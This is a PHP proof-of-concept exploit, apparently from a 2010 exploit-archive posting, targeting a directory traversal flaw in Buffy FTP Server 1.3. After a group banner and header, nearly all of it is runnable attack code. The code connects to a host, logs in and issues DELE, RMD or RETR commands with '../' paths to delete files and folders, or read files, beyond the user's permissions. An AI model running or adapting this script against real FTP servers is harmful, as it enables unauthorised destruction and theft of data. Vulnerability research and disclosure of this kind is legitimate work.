|
<?php # _ ____ __ __ ___ # (_)____ _ __/ __ \/ /_____ ____/ / _/_/ | # / // __ \ | / / / / / //_/ _ \/ __ / / / / / # / // / / / |/ / /_/ / ,< / __/ /_/ / / / / / # /_//_/ /_/|___/\____/_/|_|\___/\__,_/ / /_/_/ # Live by the byte |_/_/ # # Members: # # Pr0T3cT10n # -=M.o.B.=- # TheLeader # Sro # Debug # # Contact: inv0ked.israel@gmail.com # # ----------------------------------- # The following is a proof of concept for a path traversal vulnerability that exists in Buffy FTP Server. # The vulnerability allows an unprivileged attacker to read files and delete files & folders whom he has no permissions to. # The vulnerable FTP commands are: # * RETR - Read File # * RMD - Remove Directory # * DELE - Delete File #----------------------------------- # Exploit Title: Buffy v1.3 Remote Directory Traversal Exploit # Date: 31/10/2010 # Author: Pr0T3cT10n # Software Link: http://www.smotricz.com/opensource/buffy/Buffy.zip # Affected Version: 1.3 # Tested on Windows XP Hebrew, Service Pack 3 # ISRAEL, NULLBYTE.ORG.IL
error_reporting(E_ALL); if(count($argv) <= 4) { echo("\r\n# Usage: {$argv[0]} [HOST] [PORT] [USER] [PASS]\r\n"); echo("\tHOST - An host using Buffy FTP Server\r\n"); echo("\tPORT - Default is 21\r\n"); echo("\tUSER - Username\r\n"); echo("\tPASS - Password\r\n"); exit("\r\n"); } else { $CMD = ''; $CFG = Array('file' => $argv[0], 'host' => $argv[1], 'port' => $argv[2], 'user' => $argv[3], 'pass' => $argv[4]); $sock = fsockopen($CFG['host'], $CFG['port'], $errno, $errstr, 5); if($sock) { echo("(+) Connected to the FTP server at '{$CFG['host']}' on port {$CFG['port']}\r\n"); $read = fread($sock, 1024); fwrite($sock, "USER {$CFG['user']}\r\n"); $read = fread($sock, 1024); fwrite($sock, "PASS {$CFG['pass']}\r\n"); $read = fread($sock, 1024); echo("(~) What would you like to do?\r\n\t1.Remove File\r\n\t2.Remove Directory\r\n\t3.Read File\r\n"); $CHSE = rtrim(fgets(STDIN)); if($CHSE == 1) { $CMD.= "DELE"; echo("(~) Path to file(for example: ../../../test.txt): "); $PATH = rtrim(fgets(STDIN)); if($PATH != '') { fwrite($sock, "{$CMD} {$PATH}\r\n"); echo(fread($sock, 1024)); } else { exit("(-) Empty path.\r\n"); } } elseif($CHSE == 2) { $CMD.= "RMD"; echo("(~) Path to directory(for example: ../../../test): "); $PATH = rtrim(fgets(STDIN)); if($PATH != '') { fwrite($sock, "{$CMD} {$PATH}\r\n"); echo(fread($sock, 1024)); } else { exit("(-) Empty path.\r\n"); } } elseif($CHSE == 3) { $CMD.= "RETR"; echo("(~) Path to file(for example: ../../../test.txt): "); $PATH = rtrim(fgets(STDIN)); if($PATH != '') { fwrite($sock, "PASV\r\n"); $read = fread($sock, 1024); $xpld = explode(',', $read); $addr_tmp = explode('(', $xpld[0]); $address = "{$addr_tmp[1]}.{$xpld[1]}.{$xpld[2]}.{$xpld[3]}"; $port_tmp = explode(')', $xpld[5]); $newport = ($xpld[4]*256)+$port_tmp[0]; fwrite($sock, "{$CMD} {$PATH}\r\n"); $read = fread($sock, 1024); $socket = fsockopen($address, $newport, $errno, $errstr, 5); if($socket) { echo(fread($socket, 1024)); } } else { exit("(-) Empty path.\r\n"); } } else { exit("(-) You have to choose correctly.\r\n"); } } else { exit("(-) Unable to connect to {$CFG['host']}:{$CFG['port']}\r\n"); } } ?>
|